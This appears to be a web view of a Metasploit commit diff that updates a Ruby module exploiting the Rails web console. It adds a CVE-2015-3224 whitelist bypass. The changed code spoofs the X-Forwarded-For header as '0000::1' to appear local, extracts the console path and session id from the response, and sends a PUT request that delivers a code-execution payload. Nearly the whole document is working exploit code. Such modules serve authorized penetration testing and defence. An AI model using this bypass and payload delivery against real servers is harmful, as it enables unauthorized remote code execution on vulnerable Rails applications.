Browse Source

Land #6865, Add CVE-2015-3224 support to rails_web_console_v2_code_exec

wchen-r7 3 years ago
parent
commit
13adc3ee0a
No account linked to committer's email address
1 changed files with 42 additions and 22 deletions
  1. 42
    22
      modules/exploits/multi/http/rails_web_console_v2_code_exec.rb

+ 42
- 22
modules/exploits/multi/http/rails_web_console_v2_code_exec.rb View File

@@ -12,24 +12,32 @@ class MetasploitModule < Msf::Exploit::Remote
12 12
 
13 13
   def initialize(info = {})
14 14
     super(update_info(info,
15
-      'Name'           => 'Ruby on Rails Development Web Console (v2) Code Execution',
15
+      'Name'           => 'Ruby on Rails Web Console (v2) Whitelist Bypass Code Execution',
16 16
       'Description'    => %q{
17
-          This module exploits a remote code execution feature of the Ruby on Rails
18
-        framework. This feature is exposed if the config.web_console.whitelisted_ips
19
-        setting includes untrusted IP ranges and the web-console gem is enabled.
17
+          This module exploits an IP whitelist bypass vulnerability in the developer
18
+        web console included with Ruby on Rails 4.0.x and 4.1.x. This module will also
19
+        achieve code execution on Rails 4.2.x if the attack is launched from a
20
+        whitelisted IP range.
20 21
       },
21
-      'Author'         => ['hdm'],
22
+      'Author'         => [
23
+        'joernchen <joernchen[at]phenoelit.de>', # Discovery & disclosure
24
+        'Ben Murphy <benmmurphy@gmail.com>',     # Discovery & disclosure
25
+        'hdm'                                    # Metasploit module
26
+      ],
22 27
       'License'        => MSF_LICENSE,
23 28
       'References'     =>
24 29
         [
25
-          [ 'URL', 'https://github.com/rails/web-console' ]
30
+          [ 'CVE', '2015-3224' ],
31
+          [ 'URL', 'http://openwall.com/lists/oss-security/2015/06/16/18' ],
32
+          [ 'URL', 'https://groups.google.com/forum/message/raw?msg=rubyonrails-security/lzmz9_ijUFw/HBMPi4zp5NAJ' ],
33
+          [ 'URL', 'https://hackerone.com/reports/44513' ]
26 34
         ],
27 35
       'Platform'       => 'ruby',
28 36
       'Arch'           => ARCH_RUBY,
29 37
       'Privileged'     => false,
30 38
       'Targets'        => [ ['Automatic', {} ] ],
31 39
       'DefaultOptions' => { 'PrependFork' => true },
32
-      'DisclosureDate' => 'May 2 2016',
40
+      'DisclosureDate' => 'Jun 16 2015',
33 41
       'DefaultTarget' => 0))
34 42
 
35 43
     register_options(
@@ -45,7 +53,10 @@ class MetasploitModule < Msf::Exploit::Remote
45 53
   def exploit
46 54
     res = send_request_cgi({
47 55
       'uri'     => normalize_uri(target_uri.path),
48
-      'method'  => 'GET'
56
+      'method'  => 'GET',
57
+      'headers' => {
58
+        'X-Forwarded-For' => '0000::1'
59
+      }
49 60
     }, 25)
50 61
 
51 62
     unless res
@@ -53,29 +64,38 @@ class MetasploitModule < Msf::Exploit::Remote
53 64
       return
54 65
     end
55 66
 
56
-    unless res.body.to_s =~ /data-mount-point='([^']+)'/
57
-      if res.body.to_s.index('Application Trace') && res.body.to_s.index('Toggle session dump')
58
-        print_error('Error: The web console is either disabled or you are not in the whitelisted scope')
59
-      else
60
-        print_error("Error: No rails stack trace found requesting #{datastore['TARGETURI']}")
61
-      end
62
-      return
67
+    web_console_path = nil
68
+
69
+    # Support vulnerable Web Console versions
70
+    if res.body.to_s =~ /data-remote-path='([^']+)'/
71
+      web_console_path = "/" + $1
63 72
     end
64 73
 
65
-    console_path = normalize_uri($1, 'repl_sessions')
74
+    # Support newer Web Console versions
75
+    if web_console_path.nil? && res.body.to_s =~ /data-mount-point='([^']+)'/
76
+      web_console_mount = $1
77
+      unless res.body.to_s =~ /data-session-id='([^']+)'/
78
+        print_error("Error: No session id found requesting #{datastore['TARGETURI']}")
79
+        return
80
+      end
81
+      web_console_path = normalize_uri(web_console_mount, 'repl_sessions', $1)
82
+    end
66 83
 
67
-    unless res.body.to_s =~ /data-session-id='([^']+)'/
68
-      print_error("Error: No session id found requesting #{datastore['TARGETURI']}")
84
+    unless web_console_path
85
+      if res.body.to_s.index('Application Trace') && res.body.to_s.index('Toggle session dump')
86
+        print_error('Error: The web console is patched, disabled, or you are not in the whitelisted scope')
87
+      else
88
+        print_error("Error: No web console path found when requesting #{datastore['TARGETURI']}")
89
+      end
69 90
       return
70 91
     end
71 92
 
72
-    session_id = $1
73
-
74
-    print_status("Sending payload to #{console_path}/#{session_id}")
93
+    print_status("Sending payload to #{web_console_path}")
75 94
     res = send_request_cgi({
76
-      'uri'       => normalize_uri(console_path, session_id),
95
+      'uri'       => web_console_path,
77 96
       'method'    => 'PUT',
78 97
       'headers'   => {
98
+        'X-Forwarded-For'  => '0000::1',
79 99
         'Accept'           => 'application/vnd.web-console.v2',
80 100
         'X-Requested-With' => 'XMLHttpRequest'
81 101
       },

Loading…
Cancel
Save